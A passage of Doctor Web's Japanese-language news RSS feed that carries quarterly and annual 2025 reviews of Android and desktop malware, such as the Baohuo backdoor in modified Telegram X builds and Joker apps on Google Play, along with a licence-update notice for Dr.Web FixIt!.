&lt;p&gt;最も多く検出されたリスクウェアはNP Managerユーティリティを使用して改造されたアプリとなりました（&lt;b&gt;Tool.NPMod&lt;/b&gt;として検出）。NP Managerはアプリのコードを難読化し、改造後にデジタル署名の検証をすり抜けることを可能にします。最も多く検出されたアドウェアは、ユーザーの使用中に自動で広告リンクを開くWhatsApp MessengerのMod（改造版）&lt;a href="https://vms.drweb.co.jp/search/?q=Adware.ModAd&amp;lng=ja"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; でした。&lt;/p&gt;

&lt;p&gt;2025年には、Androidデバイスのファームウェア感染について新たな事例が確認されました。Doctor Webではそのうちの1例について4月に記事を公開しています。複数の安価なスマートフォンモデルのシステム領域内に、ユーザーから仮想通貨を盗むトロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Clipper.31&amp;lng=ja"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; がプリインストールされていたというものです。また別のAndroidスマートフォンモデルのファームウェア内に危険なトロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Triada&amp;lng=ja"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; が埋め込まれているという事例もありました。そのほか、2024年にDoctor Webによって &lt;a href="https://news.drweb.co.jp/show/?i=14900&amp;lng=ja" target="_blank"&gt;発見された&lt;/a&gt; トロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Vo1d&amp;lng=ja"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; の新たな亜種によるAndroid TVボックスセットのファームウェア感染にも新たな事例が観測されています。&lt;/p&gt;

&lt;p&gt;2025年を通して、Doctor Webのアンチウイルスラボではいくつもの危険なマルウェアを特定してきました。4月には、脅威アクターによって改変された地図アプリ「AlpineQuest」内に潜むトロイの木馬 &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Spy.1292.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt; について記事を公開しています。&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Spy.1292.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt; はロシアの軍関係者を標的としており、携帯電話番号とアカウント、電話帳の連絡先、デバイスの位置情報、デバイスのメモリ内に保存されているファイルに関する情報といった機密データをサイバー犯罪者に送信していました。また、攻撃者からコマンドを受け取った場合は特定のファイルを盗むこともできます。主に狙われていたのはユーザーがTelegramやWhatsApp経由で送信する機密文書、そしてAlpineQuestによって作成される位置情報ログファイルでした。&lt;/p&gt;

&lt;p&gt;8月には、人気のメッセージングアプリのダイレクトメッセージ（DM）からアンチウイルスを装って拡散されていたバックドア &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.916.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; について記事を公開しました。&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.916.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; は機密情報を窃取し、攻撃者がユーザーをスパイすることを可能にします。その主たる標的はロシア企業の従業員でした。&lt;/p&gt;

&lt;p&gt;10月には、メッセンジャーアプリTelegram Xの改変版に潜む多機能バックドア &lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; が発見されました。このマルウェアは被害者のTelegramアカウントからログインIDとパスワード、着信SMS、チャット、クリップボードの内容などといった機密データを窃取します。さらに、&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; を使用することで攻撃者はハッキングしたアカウントとメッセンジャー自体の両方を完全に乗っ取ることが可能です。このバックドアの操作には従来の方法であるC2サーバー経由に加え、これまでAndroidマルウェアでは例を見ないRedisデータベース経由でのコマンド送信が使用されています。&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; の標的とされていたのは主にブラジルとインドネシアのユーザーでした。&lt;/p&gt;

&lt;p&gt;2025年のモバイルデバイスを取り巻くセキュリティ脅威の状況についての詳細は&lt;a href="https://news.drweb.co.jp/show/?i=15104" target="_blank"&gt;こちらのレビュー&lt;/a&gt;をご覧ください。&lt;/p&gt;

&lt;h3&gt;今後の動向と展望&lt;/h3&gt;

&lt;p&gt;2026年にも、サイバー犯罪者の違法な収益源であるアドウェア型トロイの木馬が最も多く検出される脅威の1つとして君臨し続けるでしょう。同じくサイバー犯罪者に利益をもたらすバンキング型トロイの木馬もますます多く使用されるようになると予想されます。&lt;/p&gt;

&lt;p&gt;2026年には、パッカーや難読化ツール、悪意のあるドロッパーや多段階ダウンローダ、ペイロードを隠すためのステガノグラフィの使用をはじめとした、悪意のあるアクティビティを隠蔽するためのさまざまなツールや手法が一層広く用いられるようになる可能性があります。また、マルウェアの作成にAIアシスタントがますます多く活用されるようになるとみられます。これによりプログラミング経験の浅いサイバー犯罪者でもマルウェア生成が可能となり、新たなマルウェアファミリーの出現と脅威数の増加を引き起こすことになるでしょう。&lt;/p&gt;

&lt;p&gt;政府機関や企業は引き続きサイバー犯罪者のターゲットとなり、標的型攻撃が増加するでしょう。AndroidスマートフォンやTVボックスセット、そしてその他モバイルデバイスのファームウェアが感染する新たな事例も発生する可能性が高いと考えられます。特に低価格帯のデバイスで気を付ける必要があります。インターネット詐欺は今後も横行するでしょう。&lt;/p&gt;</description></item><item><guid>https://news.drweb.co.jp/show/?i=15095&amp;lng=ja</guid><title>Dr.Web FixIt! ライセンス使用許諾の更新</title><link>https://news.drweb.co.jp/show/?i=15095&amp;lng=ja&amp;c=5</link><pubDate>Mon, 29 Dec 2025 15:42:04 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Dr.Web FixIt! のライセンス使用許諾契約が更新されました。&lt;br&gt;更新後の契約内容は、以下のリンクよりご確認いただけます。&lt;a href="https://license.drweb.com/agreement"&gt;https://license.drweb.com/agreement&lt;/a&gt; 。&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Dr.Web FixIt! は、Windows OS に対応したワークステーションおよびサーバーを対象に、詳細なセキュリティ解析を行い、検出されたウイルス脅威や潜在的な脆弱性を駆除するためのソリューションです。他のサイバーセキュリティツールでは検出が困難な最新型マルウェアや、標的型攻撃に悪用されるプログラムを検出できる点が、Dr.Web FixIt! の大きな特長です。&lt;/p&gt;&lt;p&gt;本製品は、ITインフラのセキュリティ監視やサイバーインシデント解析を行う専門家の利用を想定して開発されていますが、専任の SOC チームが存在しない環境においても、ワークステーションやサーバー上の脅威を検出し、修復を実行することが可能です。&lt;/p&gt;&lt;p&gt;また、必要に応じて、Dr.Web FixIt! を用いて取得した解析情報について、Doctor Web の専門家による分析支援を依頼することができます。その際は、専門家サポートが提供されるサーティフィケートをご購入いただく必要があります。&lt;/p&gt;&lt;p&gt;Dr.Web FixIt! は、Doctor Web &lt;a href="https://partners.drweb.co.jp/find_partner/?lng=ja"&gt;パートナー&lt;/a&gt;よりご購入いただけます。&amp;nbsp;&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.co.jp/show/?i=15101&amp;lng=ja</guid><title>2025年第4四半期のモバイルマルウェアレビュー</title><link>https://news.drweb.co.jp/show/?i=15101&amp;lng=ja&amp;c=5</link><pubDate>Fri, 26 Dec 2025 02:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;2025年12月26日&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Dr.Web Security Space for mobile devices（モバイルデバイス向けDr.Web Security Space）によって収集された検出統計によると、2025年第4四半期に最も多く検出されたAndroid脅威は引き続き、迷惑な広告を表示するトロイの木馬&lt;a href="https://vms.drweb.co.jp/search/?q=Android.MobiDash&amp;lng=ja"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; および &lt;a href="https://vms.drweb.co.jp/search/?q=Android.HiddenAds&amp;lng=ja"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;となりました。ただし、その活動には低下がみられ、検出数はそれぞれ43.24%と18.06%減少しています。&lt;b&gt;Android.Siggen&lt;/b&gt; ファミリーに属するトロイの木馬がその後を追う形となりましたが、その検出数も27.47%減少しています。このトロイの木馬ファミリーにはそれぞれ異なる機能を持つ多様なマルウェアが含まれています。&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;一方でバンキング型トロイの木馬の活動には顕著な活発化がみられ、その検出数は65.52%増加しています。この増加を牽引しているのが&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Banker&amp;lng=ja"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;ファミリーに属するトロイの木馬です。これらトロイの木馬は銀行取引の確認用ワンタイムコードを含んだSMSを傍受するほか、正規銀行アプリの外観を模倣したり、フィッシング画面を表示したりすることも可能です。&lt;/p&gt;

&lt;p&gt;最も多く検出された望ましくないアプリケーションは、クラウドサービスCloudInjectを使用して改造されたAndroidアプリとなりました（Dr.Webアンチウイルスによって&lt;a href="https://vms.drweb.co.jp/search/?q=Program.CloudInject&amp;lng=ja"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;として検出）。CloudInjectを介した改造ではアプリに危険な権限や難読化されたコードが追加され、そのコードの目的はコントロールすることができません。また、アンチウイルスの動作を模倣して存在しない脅威の検出を通知し、感染から「修復」するために製品の完全版を購入するよう促す偽アンチウイルス&lt;a href="https://vms.drweb.co.jp/search/?q=Program.FakeAntiVirus&amp;lng=ja"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt; や、さまざまなタスクを完了することでお金を稼ぐことができるとうたうアプリ &lt;a href="https://vms.drweb.co.jp/search/?q=Program.FakeMoney&amp;lng=ja"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;も多く検出されています。&lt;/p&gt;

&lt;p&gt;最も多く検出されたリスクウェアは、NP Managerユーティリティを使用して改造されたアプリ&lt;b&gt;Tool.NPMod&lt;/b&gt;となりました。このユーティリティはアプリのコードを難読化し、デジタル署名の検証をすり抜けることを可能にする特殊なモジュールを埋め込みます。最も多く検出されたアドウェアの座は依然として&lt;a href="https://vms.drweb.co.jp/search/?q=Adware.Adpush&amp;lng=ja"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;ファミリーが占めています。これらは開発者によってアプリに組み込まれる特殊なソフトウェアモジュールで、広告を含んだ通知を表示させます。&lt;/p&gt;

&lt;p&gt;
    10月、Doctor WebはメッセンジャーアプリTelegram Xの非公式改変版に潜む危険なバックドア&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;を発見しました。このバックドアは悪意のあるWebサイトやサードパーティアプリストアから拡散され、TelegramアカウントのログインIDとパスワードなどといった機密情報を窃取します。また、&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;を使用することで脅威アクターは被害者のアカウントを乗っ取り、メッセンジャー内でユーザーに成り代わってさまざまな操作を密かに実行することが可能です。たとえば、ユーザーをTelegramチャンネルに参加・退出させたり、特定のチャットや新規認証済みデバイスを非表示にしたりすることができます。脅威アクターによるこのバックドアの操作には複数の方法が使用されており、そのうちの1つがRedisデータベースを経由するというものです。これは、Android脅威ではこれまでに例を見ない手法です。合計で約58,000台のデバイスが&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;に感染しており、これにはおよそ3千の異なるモデルのスマートフォンやタブレット、TVボックスセット、そしてAndroidベースの車載OSを搭載した自動車が含まれています。
&lt;/p&gt;

&lt;p&gt;Google Playでは第4四半期を通して新たなマルウェアが発見され、それらの中には被害者を有料サービスに登録するトロイの木馬&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Joker&amp;lng=ja"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;や、詐欺スキームに用いられるさまざまな偽アプリ&lt;a href="https://vms.drweb.co.jp/search/?q=Android.FakeApp&amp;lng=ja"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;が含まれていました。これらは合計で263,000回以上ダウンロードされています。&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;2025年第4四半期の主な傾向&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;広告を表示するトロイの木馬が引き続き最も多く検出されたAndroid脅威となる&lt;/li&gt;
        &lt;li&gt;バンキング型トロイの木馬による攻撃件数が増加&lt;/li&gt;
        &lt;li&gt;メッセンジャーTelegram Xの改変版に組み込まれた危険なバックドア&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ja"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;が拡散される&lt;/li&gt;
        &lt;li&gt;Google Playに新たな悪意のあるアプリが出現&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Dr.Web Security Space for mobile devicesによる統計&lt;/h3&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/01_malware_q4_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/01_malware_q4_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Android.MobiDash&amp;lng=ja"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7859&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;迷惑な広告を表示させるトロイの木馬です。開発者によってアプリケーション内に埋め込まれる特殊なソフトウェアモジュールです。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Android.FakeApp&amp;lng=ja"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;設定にハードコードされたWebサイトを開くトロイの木馬アプリです。既知の亜種ではオンラインカジノのサイトが開かれます。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Click&amp;lng=ja"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;さまざまなWebサイトをバックグラウンドで密かに読み込むことができる、悪意のあるWhatsAppメッセンジャーMod（改造版）の検出名です。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Android.Packed.57.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;悪意のあるアプリ（バンキング型トロイの木馬&lt;b&gt;Android.SpyMax&lt;/b&gt;の一部の亜種など）などを保護するために使用される難読化ツールの検出名です。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Triada&amp;lng=ja"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5847&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Triada&amp;lng=ja"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;トロイの木馬を検出や解析から保護するよう設計されたパッカーの検出名です。多くの場合、このパッカーは&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Triada&amp;lng=ja"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;が埋め込まれた悪意のあるTelegramメッセンジャーMod（改造版）と一緒に用いられます。&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/02_unwanted_q_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/02_unwanted_q_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Program.CloudInject&amp;lng=ja"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Program.CloudInject&amp;lng=ja"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;
        クラウドサービスCloudInjectと、同名のAndroidユーティリティ（&lt;a href="https://vms.drweb.co.jp/search/?q=Tool.CloudInject&amp;lng=ja"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;としてDr.Webウイルスデータベースに追加されています）を使用して改造されたAndroidアプリケーションの検出名です。アプリケーションはリモートサーバー上で改造されますが、その際、改造を行うユーザーはアプリに何が追加されるのか具体的な改造内容をコントロールすることができません。また、これらのアプリケーションは危険なシステム権限を複数要求します。改造後、ユーザーはこれらアプリをリモートで管理できるようになります（アプリをブロックする、カスタムダイアログを表示する、他のソフトウェアのインストールや削除を追跡するなど）。
    &lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Program.FakeAntiVirus&amp;lng=ja"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;アンチウイルスソフトウェアを模倣するアドウェアアプリケーションの検出名です。これらのアプリは存在しない脅威について偽の通知をすることでユーザーを騙し、ソフトウェアの完全版を購入するよう要求します。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Program.FakeMoney&amp;lng=ja"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;さまざまなタスクを完了することでお金を稼ぐことができるとうたうAndroidアプリケーションの検出名です。このアプリはタスクが完了するたびに報酬が貯まっていくかのように見せかけます。「稼いだ」お金を引き出すために（多くの場合、一般的に広く使用されている支払いシステムや銀行を指定されます）、ユーザーは一定の金額を貯める必要があるとされていますが、たとえその金額が貯まったとしても実際にお金を手にすることはできません。このウイルスレコードは、そのようなアプリのソースコードを基に作成された他の望ましくないソフトウェアの検出にも使用されます。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Program.SnoopPhone.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Androidユーザーのアクティビティを監視するよう設計されたアプリケーションです。このアプリを使用することで、第三者がSMSを読む、通話に関する情報を収集する、デバイスの位置を追跡する、周囲の音声を録音することが可能になります。&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/03_riskware_q4_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/03_riskware_q4_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;NP Managerユーティリティを使用して改造されたAndroidアプリケーションの検出名です。そのようなアプリには特殊なモジュールが組み込まれており、改造後にデジタル署名の検証をバイパスすることができます。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Tool.LuckyPatcher&amp;lng=ja"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Androidデバイスにインストールされたアプリを改変できるようにする（パッチを作成する）ツールです。アプリの動作ロジックを変更したり特定の制限を回避したりする目的で使用されます。たとえば、ユーザーはこのツールを使用することで、バンキングアプリのルートアクセス検証を無効にしたり、ゲーム内で無限のリソースを取得したりできます。パッチを追加するために、このユーティリティは特別に作成されたスクリプトをインターネットからダウンロードしますが、このスクリプトは誰でも作成して共通のデータベースに追加することができます。そのようなスクリプトの機能が悪意のあるものである場合もあることから、このツールを使用して作成されたパッチは潜在的な脅威となる可能性があります。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Tool.Androlua&amp;lng=ja"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;スクリプト言語Luaを使用してAndroidアプリを開発するための特別なフレームワークの、潜在的に危険なバージョンの検出名です。Luaベースアプリの主なロジックは、実行時に対応するスクリプトがインタプリタによって暗号化・復号化されるというものです。多くの場合、このフレームワークは動作するためにデフォルトで多数のシステム権限へのアクセスを要求します。その結果、フレームワークが実行するLuaスクリプトによって、取得した権限に応じたさまざまな悪意のある動作が実行される可能性があります。&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/04_adware_q4_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/04_adware_q4_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Adware.AdPush&amp;lng=ja"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Adware.Adpush&amp;lng=ja"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Androidアプリに組み込まれるアドウェアモジュールのファミリーです。ユーザーを騙すような紛らわしい、広告を含んだ通知（オペレーティングシステムからの通知に似せたものなど）を表示させます。また、さまざまな機密情報を収集し、別のアプリをダウンロードしてインストールを開始することができます&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Bastion.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;「最適化」中に広告を表示させる目的で、ユーザーに誤解させるような虚偽の通知（ストレージ容量不足やシステムエラーに関するものなど）を定期的に出す最適化ツールの検出名です。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Airpush.7.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Androidアプリに組み込まれ、さまざまな広告を表示するアドウェアモジュールのファミリーです。表示されるものはモジュールのバージョンや亜種によって異なり、広告を含む通知やポップアップウィンドウ、バナーなどがあります。多くの場合、攻撃者はユーザーにさまざまなソフトウェアをインストールするよう促してマルウェアを拡散させる目的で、これらのモジュールを使用しています。さらに、これらモジュールは個人情報を収集してリモートサーバーに送信します。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Adware.ModAd&amp;lng=ja"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;その機能に特定のコードが挿入されている、WhatsAppメッセンジャーのMod（改造版）です。このコードはメッセンジャーの動作中にWebコンテンツを表示（Android WebViewコンポーネントを使用して）させることで目的のURLをロードします。これらのURLから、オンラインカジノやブックメーカー、アダルトサイトなどの広告サイトへのリダイレクトが実行されます。&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Google Play上の脅威&lt;/h3&gt;

&lt;p&gt;
    2025年第4四半期には、Doctor Webのウイルスアナリストによって20を超える悪意のある&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Joker&amp;lng=ja"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;アプリがGoogle Play上で発見されました。&lt;a href="https://vms.drweb.co.jp/search/?q=Android.Joker&amp;lng=ja"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;はユーザーを有料サービスに登録するよう設計されており、メッセンジャーやシステム最適化ツール、画像編集アプリ、動画再生アプリなどさまざまなアプリに偽装していました。
&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/05_Android.Joker_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/05_Android.Joker_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;発見された悪意のある&lt;b&gt;Android.Joker&lt;/b&gt;アプリの例：&lt;b&gt;Android.Joker.2496&lt;/b&gt;はスマホ内のジャンクを削除するツール「Useful Cleaner」に偽装し、&lt;b&gt;Android.Joker.2495&lt;/b&gt;の亜種の1つは動画再生アプリ「Reel Drama」を装って拡散されていた&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;
    &lt;a href="https://vms.drweb.co.jp/search/?q=Android.FakeApp&amp;lng=ja"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;ファミリーに属する偽アプリも新たなものがいくつか発見されています。これまで同様、その一部は金融関連アプリとして拡散され、詐欺サイトを開くよう設計されていました。また別の一部はゲームを装って拡散されています。このタイプの&lt;a href="https://vms.drweb.co.jp/search/?q=Android.FakeApp&amp;lng=ja"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;は特定の条件下（ユーザーのIPアドレスが攻撃者の指定した条件に一致する場合など）でオンラインカジノやブックメーカーのサイトを開く場合があります。
&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/06_Android.FakeApp.1910_1_Chicken_Road_Fun.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/06_Android.FakeApp.1910_1_Chicken_Road_Fun.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;ゲーム「Chicken Road Fun」に偽装した&lt;a href="https://vms.drweb.co.jp/search/?q=Android.FakeApp.1910&amp;lng=ja"&gt;&lt;b&gt;Android.FakeApp.1910&lt;/b&gt;&lt;/a&gt;：この偽アプリはゲームとして機能する代わりにオンラインカジノのサイトを開く場合がある&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;お使いのAndroidデバイスをマルウェアや望ましくないプログラムから保護するために、Android向け Dr.Webアンチウイルス製品をインストールすることをお勧めします。&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q4%202025%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank"&gt;Indicators of compromise（セキュリティ侵害インジケーター）&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.co.jp/show/?i=15099&amp;lng=ja</guid><title>2025年第4四半期のウイルスレビュー</title><link>https://news.drweb.co.jp/show/?i=15099&amp;lng=ja&amp;c=5</link><pubDate>Fri, 26 Dec 2025 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;2025年12月26日&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Dr.Webアンチウイルスの検出統計によると、2025年第4四半期に検出された脅威の合計数は2025年第3四半期と比較して16.05%増加し、一方でユニークな脅威の数は1.13%減少しました。最も多く検出された脅威は、望ましくないアドウェアアプリ、悪意のあるスクリプト、そしてダウンローダやアドウェア型トロイの木馬を含むさまざまなマルウェアとなっています。&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;メールトラフィック内では、ダウンローダやパスワードスティーラー、ドロッパーなどのトロイの木馬アプリが最も多く検出されました。そのほか、エクスプロイト、バックドア、そしてさまざまな悪意のあるスクリプトも多く拡散されています。&lt;/p&gt;

